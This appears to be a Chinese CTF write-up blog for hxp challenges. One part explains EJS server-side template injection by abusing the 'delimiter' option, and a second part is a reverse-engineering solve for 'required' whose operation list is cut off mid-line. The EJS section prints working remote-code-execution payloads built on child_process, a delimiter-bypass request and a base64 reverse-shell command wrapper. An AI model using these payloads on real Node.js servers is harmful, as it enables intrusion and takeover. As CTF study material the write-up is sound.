<p>这里先做个白日梦，如果传进去的 query 能影响到后面的一串 delimiter 的配置，那就可以绕过 <code>&lt;%= name %&gt;</code> 的过滤了。</p>
<p>因为只要能自定义 delimiter，一开始就可以传一个 <code>&lt;x 任意js代码 x&gt;</code>，再把 <code>delimiter = &#39;x&#39;</code>，便可以任意js代码执行。</p>
<p><img src="%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_70c12b8c-d0e3-48a1-9a99-914017a1a89f.png" alt="企业微信截图_70c12b8c-d0e3-48a1-9a99-914017a1a89f"></p>
<p>后面做了一些猜测尝试，比如在访问 template 时直接GET方法传递 openDelimiter 和 closeDelimiter，都没有生效….</p>
<p>这里从 ejs（<a target="_blank" rel="noopener" href="https://github.com/mde/ejs%EF%BC%89">https://github.com/mde/ejs）</a> 的源代码中，跟进一下 <code>ejs.render()</code> 看看做了什么：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exports</span>.render = <span class="function"><span class="keyword">function</span> (<span class="params">template, d, o</span>) </span>&#123;</span><br><span class="line">  <span class="keyword">var</span> data = d || utils.createNullProtoObjWherePossible();</span><br><span class="line">  <span class="keyword">var</span> opts = o || utils.createNullProtoObjWherePossible();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// No options object -- if there are optiony names</span></span><br><span class="line">  <span class="comment">// in the data, copy them to options</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">arguments</span>.length == <span class="number">2</span>) &#123;</span><br><span class="line">    utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA); <span class="comment">// 跟进</span></span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> handleCache(opts, template)(data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>所以 <code>render()</code>如果能传三个参数，那第三个参数的 <code>opts</code> 是关系到 ejs 的全局配置（跟进 <code>handleCache()</code> 可以分析出，此处不展开了），也就能设置 <code>delimiter</code> ，但题目不能直接传递第三个参数。</p>
<p>题目执行的是 <code>res.render(template, query);</code>，也就是两个参数，会进入这个 if 条件中：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="built_in">arguments</span>.length == <span class="number">2</span>) &#123;</span><br><span class="line">  utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA);  <span class="comment">// 跟进</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>跟进 <code>ejs/lib/utils.js</code> 的 <code>shallowCopyFromList()</code> 函数，看看做了什么事情：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">exports</span>.shallowCopyFromList = <span class="function"><span class="keyword">function</span> (<span class="params">to, <span class="keyword">from</span>, list</span>) </span>&#123; <span class="comment">// to = opts, from = data</span></span><br><span class="line">  list = list || [];</span><br><span class="line">  <span class="keyword">from</span> = <span class="keyword">from</span> || &#123;&#125;;</span><br><span class="line">  <span class="keyword">if</span> ((to !== <span class="literal">null</span>) &amp;&amp; (to !== <span class="literal">undefined</span>)) &#123;</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; list.length; i++) &#123;</span><br><span class="line">      <span class="keyword">var</span> p = list[i];</span><br><span class="line">      <span class="keyword">if</span> (<span class="keyword">typeof</span> <span class="keyword">from</span>[p] != <span class="string">&#x27;undefined&#x27;</span>) &#123;  <span class="comment">// 如果 from 数组中有 p 元素</span></span><br><span class="line">        <span class="keyword">if</span> (!hasOwn(<span class="keyword">from</span>, p)) &#123;</span><br><span class="line">          <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (p === <span class="string">&#x27;__proto__&#x27;</span> || p === <span class="string">&#x27;constructor&#x27;</span>) &#123;</span><br><span class="line">          <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        to[p] = <span class="keyword">from</span>[p]; 	<span class="comment">// opts[p] = data[p]</span></span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> to;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>在 <code>shallowCopyFromList()</code> 函数中，从上一层传递过来的参数如下：</p>
<ul>
<li><code>to = opts</code></li>
<li><code>from = data</code> </li>
<li><code>list = _OPTS_PASSABLE_WITH_DATA</code></li>
</ul>
<p>从这块代码看，如果 <code>from</code> 数组中的元素属于 <code>list</code> 这个字典中，那么就执行 <code>to[p] = from[p]</code>。</p>
<p> <code>list</code> 是 <code>_OPTS_PASSABLE_WITH_DATA</code>，而 <code>_OPTS_PASSABLE_WITH_DATA</code> 在 <code>ejs.js</code> 中定义如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> _OPTS_PASSABLE_WITH_DATA = [<span class="string">&#x27;delimiter&#x27;</span>, <span class="string">&#x27;scope&#x27;</span>, <span class="string">&#x27;context&#x27;</span>, <span class="string">&#x27;debug&#x27;</span>, <span class="string">&#x27;compileDebug&#x27;</span>,</span><br><span class="line">  <span class="string">&#x27;client&#x27;</span>, <span class="string">&#x27;_with&#x27;</span>, <span class="string">&#x27;rmWhitespace&#x27;</span>, <span class="string">&#x27;strict&#x27;</span>, <span class="string">&#x27;filename&#x27;</span>, <span class="string">&#x27;async&#x27;</span>];</span><br></pre></td></tr></table></figure>

<p>换句话说，<code>data</code> 是用户可控的，用户传递的参数是会影响到 <code>opts</code> 数组的，也就是 ejs 对象的全局配置。</p>
<p>恰好也有一个配置项 <code>delimiter</code> 在这个字典中，那就可以通过 <code>GET /?delimiter=x</code> ，将 ejs 的 <code>delimiter</code> 配置这是为 <code>x</code>。这里有说明了为什么我一开始使用 <code>openDelimiter</code> 和 <code>closeDelimiter</code> 都没反应，因为都不在这个字典里面！</p>
<p><img src="%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%E6%88%AA%E5%9B%BE_3b818aae-1cfb-4a30-9455-5c13d64fd27b.png" alt="企业微信截图_3b818aae-1cfb-4a30-9455-5c13d64fd27b"></p>
<h2 id="0x03-漏洞利用"><a href="#0x03-漏洞利用" class="headerlink" title="0x03 漏洞利用"></a>0x03 漏洞利用</h2><p>先准备一些 EJS 命令执行的 payload，这里找到几个，如果无回显的话可以直接反弹shell。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 命令执行无回显</span></span><br><span class="line">&lt;% <span class="built_in">global</span>.process.mainModule.constructor._load(<span class="string">&quot;child_process&quot;</span>).exec(<span class="string">&quot;反弹shell命令&quot;</span>); %&gt;</span><br><span class="line">    </span><br><span class="line"><span class="comment">// 命令执行回显</span></span><br><span class="line">&lt;%= <span class="built_in">global</span>.process.mainModule.require(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&quot;whoami&quot;</span>); %&gt;</span><br><span class="line">    </span><br><span class="line"><span class="comment">// 命令执行回显 + 命令做base64编码</span></span><br><span class="line">&lt;%= <span class="built_in">global</span>.process.mainModule.require(<span class="string">&#x27;child_process&#x27;</span>).execSync(Buffer(<span class="string">&#x27;d2hvYW1p&#x27;</span>, <span class="string">&#x27;base64&#x27;</span>).toString()); %&gt;</span><br></pre></td></tr></table></figure>

<blockquote>
<p>更多 ejs payload 可以参考 tplmap 的代码：<a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap/blob/master/plugins/engines/ejs.py">tplmap/ejs.py at master · epinna/tplmap (github.com)</a></p>
</blockquote>
<h3 id="1、构造一个绕过-lt-的-payload"><a href="#1、构造一个绕过-lt-的-payload" class="headerlink" title="1、构造一个绕过 &lt;% 的 payload"></a>1、构造一个绕过 <code>&lt;%</code> 的 payload</h3><p>例如把 <code>%</code> 替换成 <code>$</code>，发包时最好做一下 URL 编码</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;$= <span class="built_in">global</span>.process.mainModule.require(<span class="string">&#x27;child_process&#x27;</span>).execSync(<span class="string">&quot;/readflag&quot;</span>); $&gt;</span><br></pre></td></tr></table></figure>

<p><img src="image-20230312005604287-8863874.png" alt="image-20230312005604287"></p>
<h3 id="2、访问模版链接，并指定-delimiter"><a href="#2、访问模版链接，并指定-delimiter" class="headerlink" title="2、访问模版链接，并指定 delimiter=$"></a>2、访问模版链接，并指定 <code>delimiter=$</code></h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /f69c438e-ae69-4378-895c-dbd73e138054?&amp;name=1&amp;delimiter=%24</span><br></pre></td></tr></table></figure>

<p><img src="image-20230312005736608.png" alt="image-20230312005736608"></p>
<p>Getflag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hxp&#123;W1ll_u_b3_my_V4l3nt1ne?&#125;execute this binary on the server to get the flag!</span><br></pre></td></tr></table></figure>

<h2 id="0x04-坑点"><a href="#0x04-坑点" class="headerlink" title="0x04 坑点"></a>0x04 坑点</h2><h3 id="1、关于反弹shell"><a href="#1、关于反弹shell" class="headerlink" title="1、关于反弹shell"></a>1、关于反弹shell</h3><p>为了避免字符问题，通常可以用 <code>bash -c &#123;echo,XXXX&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</code> 来反弹shell，但是在这里需要加单引号才可以，也就是：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;% <span class="built_in">global</span>.process.mainModule.constructor._load(<span class="string">&quot;child_process&quot;</span>).exec(<span class="string">&quot;bash -c &#x27;&#123;echo,XXXX&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;&quot;</span>); %&gt;</span><br></pre></td></tr></table></figure>

<p>不加单引号是反弹不了…不知道原因…</p>
<h2 id="0x05-参考资料"><a href="#0x05-参考资料" class="headerlink" title="0x05 参考资料"></a>0x05 参考资料</h2><p><a target="_blank" rel="noopener" href="https://eslam.io/posts/ejs-server-side-template-injection-rce/">EJS, Server side template injection RCE (CVE-2022-29078) - writeup | ~#whoami </a></p>
<p><a target="_blank" rel="noopener" href="https://ejs.bootcss.com/">EJS – 嵌入式 JavaScript 模板引擎 | EJS 中文文档 (bootcss.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/mde/ejs">https://github.com/mde/ejs</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/epinna/tplmap">https://github.com/epinna/tplmap</a></p>
<hr>
<h1 id="Re-required"><a href="#Re-required" class="headerlink" title="[Re] required"></a>[Re] required</h1><h2 id="0x01-题目说明"><a href="#0x01-题目说明" class="headerlink" title="0x01 题目说明"></a>0x01 题目说明</h2><p>Description:</p>
<p>I have written a super safe flag encryptor. I’m sure nobody can figure out what my original flag was:</p>
<p>0xd19ee193b461fd8d1452e7659acb1f47dc3ed445c8eb4ff191b1abfa7969</p>
<p>Dockerfile for your convenience / to ensure correct environment.</p>
<p>题目附件</p>
<p>Download:</p>
<p><a target="_blank" rel="noopener" href="https://2022.ctf.link/assets/files/required-27edfc0c02c5f748.tar.xz">required-27edfc0c02c5f748.tar.xz (11.4 KiB)</a></p>
<h2 id="0x02-解题思路"><a href="#0x02-解题思路" class="headerlink" title="0x02 解题思路"></a>0x02 解题思路</h2><p>题目是利用大量的 require 函数对大量 js 文件进行包含引入模块，从而将 flag 数组做加密，类似于一种代码混淆。</p>
<p><img src="1678637288405-c6bb15c4-c2c9-41b7-b2fc-2e29e9fdfcc3.png" alt="img"></p>
<p>每一个js文件最终生效的是后面对 f 数组的操作，前面只是一些模块导出语法。</p>
<p><img src="image-20230315141400339.png" alt="image-20230315141400339"></p>
<blockquote>
<p>nodejs可以用chrome调试，在命令行中用  <code>node inspect app.js</code>，在chrome中访问 <code>chrome://inspect</code>，然后打开DevTools就可以调试了。</p>
</blockquote>
<p>flag长度有30位，所以i、j、t一直在做取余30的计算。</p>
<p><img src="1678637353352-a985d92d-1650-451c-84d5-790f938cfc68.png" alt="img"></p>
<p>因为是动态解析js文件再做包含，其中还包括了一些复杂的模块导出和引入、清除 require 缓存的操作，如果直接解析 js 语法提取所有对 flag 数组的操作，有点绕了弯路。。一开始在这里卡了很久。</p>
<p>后来想到，何不直接改了所有js文件，再其中插入console.log，让模块被加载的同时也把操作语句给输出。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line">path = <span class="string">&#x27;./files&#x27;</span></span><br><span class="line">outpath = <span class="string">&#x27;./out&#x27;</span></span><br><span class="line">files = os.listdir(path)</span><br><span class="line">s = []</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> file <span class="keyword">in</span> files:</span><br><span class="line">    <span class="built_in">str</span> = <span class="string">&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> os.path.isdir(file) <span class="keyword">and</span> file.endswith(<span class="string">&quot;.js&quot;</span>) <span class="keyword">and</span> file != <span class="string">&quot;required.js&quot;</span>:</span><br><span class="line">        f = <span class="built_in">open</span>(path + <span class="string">&quot;/&quot;</span> + file, <span class="string">&quot;r&quot;</span>)</span><br><span class="line">        <span class="built_in">str</span> = f.read()</span><br><span class="line">        f.close()</span><br><span class="line"></span><br><span class="line">        <span class="comment"># 原文件内容：</span></span><br><span class="line">        <span class="comment">#   module.exports=(i,j,t)=&gt;(i%=30,j%=30,t%=30,i+=[],j+&quot;&quot;,t=(t+&#123;&#125;).split(&quot;[&quot;)[0],f[j]+=f[i],f[j]&amp;=0xff)</span></span><br><span class="line">        <span class="comment"># 修改成：</span></span><br><span class="line">        <span class="comment">#   module.exports=(i,j,t)=&gt;(i%=30,j%=30,t%=30,i+=[],j+&quot;&quot;,t=(t+&#123;&#125;).split(&quot;[&quot;)[0],console.log(&quot;f[&quot; + j + &quot;]+=f[&quot; + i + &quot;],f[&quot; + j + &quot;]&amp;=0xff&quot;),f[j]+=f[i],f[j]&amp;=0xff)</span></span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;i%=30&#x27;</span> <span class="keyword">in</span> <span class="built_in">str</span>:</span><br><span class="line">            oper = re.findall(<span class="string">r&#x27;f\[.*?$&#x27;</span>, <span class="built_in">str</span>)[<span class="number">0</span>][:-<span class="number">1</span>]</span><br><span class="line">            oper = oper.replace(<span class="string">&#x27;i&#x27;</span>, <span class="string">&#x27;\&quot; + i + \&quot;&#x27;</span>).replace(<span class="string">&#x27;j&#x27;</span>, <span class="string">&#x27;\&quot; + j + \&quot;&#x27;</span>).replace(<span class="string">&#x27;t&#x27;</span>, <span class="string">&#x27;\&quot; + t + \&quot;&#x27;</span>)</span><br><span class="line">            patch = <span class="string">&quot;split(\&quot;[\&quot;)[0],console.log(\&quot;&quot;</span> + oper + <span class="string">&quot;\&quot;),&quot;</span></span><br><span class="line">            <span class="built_in">str</span> = <span class="built_in">str</span>.replace(<span class="string">&quot;split(\&quot;[\&quot;)[0],&quot;</span>, patch)</span><br><span class="line">            f = <span class="built_in">open</span>(path + <span class="string">&quot;/&quot;</span> + file, <span class="string">&quot;w&quot;</span>)</span><br><span class="line">            f.write(<span class="built_in">str</span>)</span><br><span class="line">            f.close()</span><br><span class="line">            <span class="built_in">print</span> (<span class="string">&quot;[+] Open And Write: &quot;</span> + file)</span><br><span class="line">            <span class="built_in">print</span> (<span class="string">&quot;[+] &quot;</span> + <span class="built_in">str</span>)</span><br></pre></td></tr></table></figure>

<p>再次运行 required.js，获得 flag 数组的所有操作</p>
<p><img src="1678637602037-5689e0f3-8bae-4304-9ec1-54b483bb218d.png" alt="img"></p>
<p>全部整理如下：</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br></pre></td><td class="code"><pre><span class="line">f[<span class="number">17</span>]+=f[<span class="number">5</span>],f[<span class="number">17</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">29</span>]=~f[<span class="number">29</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">3</span>]^=f[<span class="number">11</span>]</span><br><span class="line">f[<span class="number">6</span>]=f[<span class="number">6</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">6</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">2</span>]=~f[<span class="number">2</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">20</span>]=f[<span class="number">20</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">20</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">23</span>]=f[<span class="number">23</span>]^(f[<span class="number">23</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">15</span>]=f[<span class="number">15</span>]^(f[<span class="number">15</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">1</span>]</span><br><span class="line">f[<span class="number">9</span>]^=f[<span class="number">4</span>]</span><br><span class="line">f[<span class="number">16</span>]=f[<span class="number">16</span>]^(f[<span class="number">16</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">28</span>]=~f[<span class="number">28</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">0</span>]=~f[<span class="number">0</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]+=f[<span class="number">13</span>],f[<span class="number">16</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">14</span>]+=f[<span class="number">29</span>],f[<span class="number">14</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]=~f[<span class="number">13</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]-=f[<span class="number">7</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">26</span>]-=f[<span class="number">0</span>],f[<span class="number">26</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">18</span>]-=f[<span class="number">29</span>],f[<span class="number">18</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">8</span>]=f[<span class="number">8</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">8</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">4</span>]=f[<span class="number">4</span>]^(f[<span class="number">4</span>]&gt;&gt;<span class="number">1</span>)</span><br><span class="line">f[<span class="number">5</span>]-=f[<span class="number">7</span>],f[<span class="number">5</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">10</span>]^=f[<span class="number">29</span>]</span><br><span class="line">f[<span class="number">15</span>]^=f[<span class="number">20</span>]</span><br><span class="line">f[<span class="number">22</span>]=f[<span class="number">22</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">22</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">4</span>]^=f[<span class="number">15</span>]</span><br><span class="line">f[<span class="number">13</span>]-=f[<span class="number">3</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">5</span>]=f[<span class="number">5</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">5</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">26</span>]=f[<span class="number">26</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">26</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">14</span>]^=f[<span class="number">21</span>]</span><br><span class="line">f[<span class="number">29</span>]=f[<span class="number">29</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">29</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">1</span>]-=f[<span class="number">4</span>],f[<span class="number">1</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">4</span>]=~f[<span class="number">4</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span class="number">13</span>]-=f[<span class="number">18</span>],f[<span class="number">13</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">16</span>]=f[<span class="number">16</span>]&lt;&lt;<span class="number">1</span>&amp;<span class="number">0xff</span>|f[<span class="number">16</span>]&gt;&gt;<span class="number">7</span></span><br><span class="line">f[<span class="number">11</span>]=f[<span class="number">11</span>]&lt;&lt;<span class="number">7</span>&amp;<span class="number">0xff</span>|f[<span class="number">11</span>]&gt;&gt;<span class="number">1</span></span><br><span class="line">f[<span class="number">7</span>]-=f[<span class="number">6</span>],f[<span class="number">7</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">11</span>]-=f[<span class="number">20</span>],f[<span class="number">11</span>]&amp;=<span class="number">0xff</span></span><br><span class="line">f[<span class="number">23</span>]=~f[<span class="number">23</span>]&amp;<span class="number">0xff</span></span><br><span class="line">f[<span 